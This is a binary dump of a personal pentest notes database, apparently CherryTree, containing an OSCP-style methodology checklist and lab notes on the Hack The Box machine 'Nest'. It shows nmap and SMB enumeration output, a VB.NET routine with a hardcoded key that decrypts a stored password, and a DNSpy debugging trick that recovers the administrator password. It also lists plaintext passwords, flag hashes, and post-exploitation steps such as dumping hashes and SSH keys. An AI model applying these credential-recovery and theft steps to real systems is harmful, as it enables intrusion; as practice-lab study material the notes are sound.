SQLite format 3@ ,-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node  '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*A?&s.=ui' 10.x.x.xcustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?L̃w'  TCPnmap -p- -Pn 10.10.10.178 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-07 19:54 EDT Nmap scan report for 10.10.10.178 Host is up (0.10s latency). Not shown: 65533 filtered ports PORT STATE SERVICE 445/tcp open microsoft-ds 4386/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 289.43 seconds custom-colors$A?&AףEA^k#'  Enumerationcustom-colors*A?&s.=u $oLv)'  Dirb\DirBustercustom-colors$A?&xA[V1 c q'  SMBsmbclient \\\\10.10.10.178\\Data Enter WORKGk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2i '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bl'  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Ad kv)'  Script Resultscustom-colorsXAIZ|xAIq/'  x'   OtherImports System.Text Imports System.Security.Cryptography Public Class Utils Public Class ConfigFile Public Property Port As Integer Public Property Username As String Public Property Password As String Public Sub SaveToFile(Path As String) Using File As New System.IO.FileStream(Path, System.IO.FileMode.Create) Dim Writer As New System.Xml.Serialization.XmlSerializer(GetType(ConfigFile)) Writer.Serialize(File, Me) End Using End Sub Public Shared Function LoadFromFile(ByVal FilePath As String) As ConfigFile Using File As New System.IO.FileStream(FilePath, System.IO.FileMode.Open) Dim Reader As New System.Xml.Serialization kkv)'  Script ResultsService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used get "Debug Mode Password.txt:Password:$DATA" </code> </pre> We suddenly have a file name Debug Mode Password.txt:Password:$DATA that contains WBQ201953D8w. Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,AףJ @u OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg O^Og'  Goodiescustom-colorsVA?& c+i'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Service Exploited: Vulnerability Type: Exploit POC: Scheduled Taskscustom-colors$ANl R?-'  Passwordsc.smith:xRxRxPANCAK3SxRxRx Debug Mode: WBQ201953D8w. Administrator:XtH4nkS4Pl4y1nGXcustom-colors$AףQԡ^%x#i' MethodologyNetwork Scanning<@/'  Proof\Flags\OtherUser - cf71b25404be5d84fd827e05f426e987 Root - 6594c2eb084bc0f08a42f0b94b878c41custom-colors$AףQ_| /9'  Software VersionsSoftware Versions Potential Exploitscustom-colorsANlH{xs/'  Proof\Flags\Othercustom-colors$ANl黺f'   Hashescustom-colors$A?&&ich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ.,  (#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree custom-colorsAףD.h  ' Log Bookcustom-colors(AI^.XmlSerializer(GetType(ConfigFile)) Return DirectCast(Reader.Deserialize(File), ConfigFile) End Using End Function End Class Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function Public Shared Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector)  Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue) Dim cipherTextBytes As Byte() cipherTextBytes = System.Convert.FromBase64String(cipherText) Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations) Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8)) Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes) Dim memoryStream As System.IO.MemoryStream memoryStream = New System.IO.MemoryStream(cipherTextBytes) Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read) Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length) Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length) memoryStream.Close() cryptoStream.Close() Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount) System.Console.WriteLine(plainText) Return plainText End Function Public Class SsoIntegration Public Property Username As String Public Property Password As String End Class Sub Main() Dim test As New SsoIntegration With {.Username = "c.smith", .Password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")} End Sub End Class custom-colorsA[EϯAףH: 88#/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File Systemcustom-colorsXAIZ|xAIq/'  Post Exploitationcustom-colors*AIZnnZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4*ch_text weight="heavy">Description: Discovery of Vulnerability setdir .. list setdir ldap >showquery 2 Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4= Exploit Code Used Create ldap.conf on Windows machine with the contents Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4= Import HqkLdap.exe into DNSpy and set Breakpoint on Console.WriteLine in the Main Module Set Watch condition on ldap.Password Run HqkLdap.exe to breakpoint Administrator:XtH4nkS4Pl4y1nGX smbclient \\\\10.10.10.178\C$ Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAףQz-ROUP\kali's password: Try "help" to get a list of possible commands. smb: \> recurse on smb: \> ls . D 0 Wed Aug 7 18:53:46 2019 .. D 0 Wed Aug 7 18:53:46 2019 IT D 0 Wed Aug 7 18:58:07 2019 Production D 0 Mon Aug 5 17:53:38 2019 Reports D 0 Mon Aug 5 17:53:44 2019 Shared D 0 Wed Aug 7 15:07:51 2019 \IT NT_STATUS_ACCESS_DENIED listing \IT\* \Production NT_STATUS_ACCESS_DENIED listing \Production\* \Reports NT_STATUS_ACCESS_DENIED listing \Reports\* \Shared . D 0 Wed Aug 7 15:07:51 2019 .. D 0 Wed Aug 7 15:07:51 2019 Maintenance D 0 Wed Aug 7 15:07:32 2019 Templates D 0 Wed Aug 7 15:0 8:07 2019 \Shared\Maintenance . D 0 Wed Aug 7 15:07:32 2019 .. D 0 Wed Aug 7 15:07:32 2019 Maintenance Alerts.txt A 48 Mon Aug 5 19:01:44 2019 \Shared\Templates . D 0 Wed Aug 7 15:08:07 2019 .. D 0 Wed Aug 7 15:08:07 2019 HR D 0 Wed Aug 7 15:08:01 2019 Marketing D 0 Wed Aug 7 15:08:06 2019 \Shared\Templates\HR . D 0 Wed Aug 7 15:08:01 2019 .. D 0 Wed Aug 7 15:08:01 2019 Welcome Email.txt A 425 Wed Aug 7 18:55:36 2019 \Shared\Templates\Marketing . D 0 Wed Aug 7 15:08:06 2019 .. D 0 Wed Aug 7 15:08:06 2019 smb: \> Maint!enance Alerts: cat Maintenance\ Alerts.txt There is currently no scheduled maintenance work. Welcome Email: cat Welcome\ Email.txt We would like to extend a warm welcome to our newest member of staff, &#60;FIRSTNAME> &#60;SURNAME> You will find your home folder in the following location: \\HTB-NEST\Users\&#60;USERNAME> If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you. Username: TempUser Password: welcome2019 Thank you HR kali@kali:~/Nest$ smbclient \\\\10.10.10.178\\Data -U TempUser Enter WORKGROUP\TempUser's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Aug 7 18:53:46 2019 .. D 0 Wed Aug 7 18:53:46 2019 IT D 0 Wed Aug 7 18:58:07 2019 Produc"tion D 0 Mon Aug 5 17:53:38 2019 Reports D 0 Mon Aug 5 17:53:44 2019 Shared D 0 Wed Aug 7 15:07:51 2019 10485247 blocks of size 4096. 6544154 blocks available smb: \> recurse on smb: \> ls . D 0 Wed Aug 7 18:53:46 2019 .. D 0 Wed Aug 7 18:53:46 2019 IT D 0 Wed Aug 7 18:58:07 2019 Production D 0 Mon Aug 5 17:53:38 2019 Reports D 0 Mon Aug 5 17:53:44 2019 Shared D 0 Wed Aug 7 15:07:51 2019 \IT . D 0 Wed Aug 7 18:58:07 2019 .. D 0 Wed Aug 7 18:58:07 2019 Archive D 0 Mon Aug 5 18:33:58 2019 Configs # D 0 Wed Aug 7 18:59:34 2019 Installs D 0 Wed Aug 7 18:08:30 2019 Reports D 0 Sat Jan 25 19:09:13 2020 Tools D 0 Mon Aug 5 18:33:43 2019 \Production . D 0 Mon Aug 5 17:53:38 2019 .. D 0 Mon Aug 5 17:53:38 2019 \Reports . D 0 Mon Aug 5 17:53:44 2019 .. D 0 Mon Aug 5 17:53:44 2019 \Shared . D 0 Wed Aug 7 15:07:51 2019 .. D 0 Wed Aug 7 15:07:51 2019 Maintenance D 0 Wed Aug 7 15:07:32 2019 Templates D 0 Wed Aug 7 15:08:07 2019 \IT\Archive . D 0 Mon Aug 5 18:33:58 2019 .. $ D 0 Mon Aug 5 18:33:58 2019 \IT\Configs . D 0 Wed Aug 7 18:59:34 2019 .. D 0 Wed Aug 7 18:59:34 2019 Adobe D 0 Wed Aug 7 15:20:09 2019 Atlas D 0 Tue Aug 6 07:16:18 2019 DLink D 0 Tue Aug 6 09:25:27 2019 Microsoft D 0 Wed Aug 7 15:23:26 2019 NotepadPlusPlus D 0 Wed Aug 7 15:31:37 2019 RU Scanner D 0 Wed Aug 7 16:01:13 2019 Server Manager D 0 Tue Aug 6 09:25:19 2019 \IT\Installs . D 0 Wed Aug 7 18:08:30 2019 .. D 0 Wed Aug 7 18:08:30 2019 \IT\Reports . D 0 Sat Jan 25 19:09:13 2020 .. % D 0 Sat Jan 25 19:09:13 2020 \IT\Tools . D 0 Mon Aug 5 18:33:43 2019 .. D 0 Mon Aug 5 18:33:43 2019 \Shared\Maintenance . D 0 Wed Aug 7 15:07:32 2019 .. D 0 Wed Aug 7 15:07:32 2019 Maintenance Alerts.txt A 48 Mon Aug 5 19:01:44 2019 \Shared\Templates . D 0 Wed Aug 7 15:08:07 2019 .. D 0 Wed Aug 7 15:08:07 2019 HR D 0 Wed Aug 7 15:08:01 2019 Marketing D 0 Wed Aug 7 15:08:06 2019 \IT\Configs\Adobe . D 0 Wed Aug 7 15:20:09 2019 .. D 0 Wed Aug 7 15:20:09 2019 editing.xml AH 246 Sat Aug 3 08:58:42 &2019 Options.txt A 0 Mon Oct 10 17:11:14 2011 projects.xml A 258 Tue Jan 8 11:30:52 2013 settings.xml A 1274 Wed Aug 7 15:19:12 2019 \IT\Configs\Atlas . D 0 Tue Aug 6 07:16:18 2019 .. D 0 Tue Aug 6 07:16:18 2019 Temp.XML A 1369 Wed Jun 11 03:38:22 2003 \IT\Configs\DLink . D 0 Tue Aug 6 09:25:27 2019 .. D 0 Tue Aug 6 09:25:27 2019 \IT\Configs\Microsoft . D 0 Wed Aug 7 15:23:26 2019 .. D 0 Wed Aug 7 15:23:26 2019 Options.xml A 4598 Sat Mar 3 14:24:24 2012 \IT\Configs\NotepadPlusPlus . D 0 Wed Aug 7 15:31:37 2019 .. ' D 0 Wed Aug 7 15:31:37 2019 config.xml A 6451 Wed Aug 7 19:01:25 2019 shortcuts.xml A 2108 Wed Aug 7 15:30:27 2019 \IT\Configs\RU Scanner . D 0 Wed Aug 7 16:01:13 2019 .. D 0 Wed Aug 7 16:01:13 2019 RU_config.xml A 270 Thu Aug 8 15:49:37 2019 \IT\Configs\Server Manager . D 0 Tue Aug 6 09:25:19 2019 .. D 0 Tue Aug 6 09:25:19 2019 \Shared\Templates\HR . D 0 Wed Aug 7 15:08:01 2019 .. D 0 Wed Aug 7 15:08:01 2019 Welcome Email.txt A 425 Wed Aug 7 18:55:36 2019 \Shared\Templates\Marketing . D 0 Wed Aug 7 15:08:06 2019 .. D ( 0 Wed Aug 7 15:08:06 2019 10485247 blocks of size 4096. 6544154 blocks available smb: \> smb: \IT\> cd Carl smb: \IT\Carl\> ls . D 0 Wed Aug 7 15:42:14 2019 .. D 0 Wed Aug 7 15:42:14 2019 Docs D 0 Wed Aug 7 15:44:00 2019 Reports D 0 Tue Aug 6 09:45:40 2019 VB Projects D 0 Tue Aug 6 10:41:55 2019 \IT\Carl\Docs . D 0 Wed Aug 7 15:44:00 2019 .. D 0 Wed Aug 7 15:44:00 2019 ip.txt A 56 Wed Aug 7 15:44:16 2019 mmc.txt A 73 Wed Aug 7 15:43:42 2019 \IT\Carl\Reports . D 0 Tue Aug 6 09:45:40 2019 .. D 0 Tue Aug 6 09:45:40 201)9 \IT\Carl\VB Projects . D 0 Tue Aug 6 10:41:55 2019 .. D 0 Tue Aug 6 10:41:55 2019 Production D 0 Tue Aug 6 10:07:13 2019 WIP D 0 Tue Aug 6 10:47:41 2019 \IT\Carl\VB Projects\Production . D 0 Tue Aug 6 10:07:13 2019 .. D 0 Tue Aug 6 10:07:13 2019 \IT\Carl\VB Projects\WIP . D 0 Tue Aug 6 10:47:41 2019 .. D 0 Tue Aug 6 10:47:41 2019 RU D 0 Fri Aug 9 11:36:45 2019 \IT\Carl\VB Projects\WIP\RU . D 0 Fri Aug 9 11:36:45 2019 .. D 0 Fri Aug 9 11:36:45 2019 RUScanner D 0 Wed Aug 7 18:05:54 2019 RUScan*ner.sln A 871 Tue Aug 6 10:45:36 2019 \IT\Carl\VB Projects\WIP\RU\RUScanner . D 0 Wed Aug 7 18:05:54 2019 .. D 0 Wed Aug 7 18:05:54 2019 bin D 0 Wed Aug 7 16:00:11 2019 ConfigFile.vb A 772 Wed Aug 7 18:05:09 2019 Module1.vb A 279 Wed Aug 7 18:05:44 2019 My Project D 0 Wed Aug 7 16:00:11 2019 obj D 0 Wed Aug 7 16:00:11 2019 RU Scanner.vbproj A 4828 Fri Aug 9 11:37:51 2019 RU Scanner.vbproj.user A 143 Tue Aug 6 08:55:27 2019 SsoIntegration.vb A 133 Wed Aug 7 18:05:58 2019 Utils.vb A 4888 Wed Aug 7 15:49:35 2019 \IT\Carl\VB Projects\WIP\RU\RUScanner\bin . D + 0 Wed Aug 7 16:00:11 2019 .. D 0 Wed Aug 7 16:00:11 2019 Debug D 0 Wed Aug 7 15:59:13 2019 Release D 0 Tue Aug 6 08:55:26 2019 \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project . D 0 Wed Aug 7 16:00:11 2019 .. D 0 Wed Aug 7 16:00:11 2019 Application.Designer.vb A 441 Tue Aug 6 08:55:13 2019 Application.myapp A 481 Tue Aug 6 08:55:13 2019 AssemblyInfo.vb A 1163 Tue Aug 6 08:55:13 2019 Resources.Designer.vb A 2776 Tue Aug 6 08:55:13 2019 Resources.resx A 5612 Tue Aug 6 08:55:13 2019 Settings.Designer.vb A 2989 Tue Aug 6 08:55:13 2019 Settings.settings A 279 Tue Aug 6 08:55:13 2019 \IT\Carl\VB Projects\WIP\RU\RUScanner\obj . D 0 Wed Aug 7 16:00:11 2019 .. D 0 Wed Aug 7 16:00:11 2019 x86 D 0 Wed Aug 7 15:59:18 2019 \IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Debug . D 0 Wed Aug 7 15:59:13 2019 .. D 0 Wed Aug 7 15:59:13 2019 \IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Release . D 0 Tue Aug 6 08:55:26 2019 .. D 0 Tue Aug 6 08:55:26 2019 \IT\Carl\VB Projects\WIP\RU\RUScanner\obj\x86 . D 0 Wed Aug 7 15:59:18 2019 .. D 0 Wed Aug 7 15:59:18 2019 10485247 blocks of size 4096. 6544154 blocks available custom-colorsA[PAףE: 55/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3Q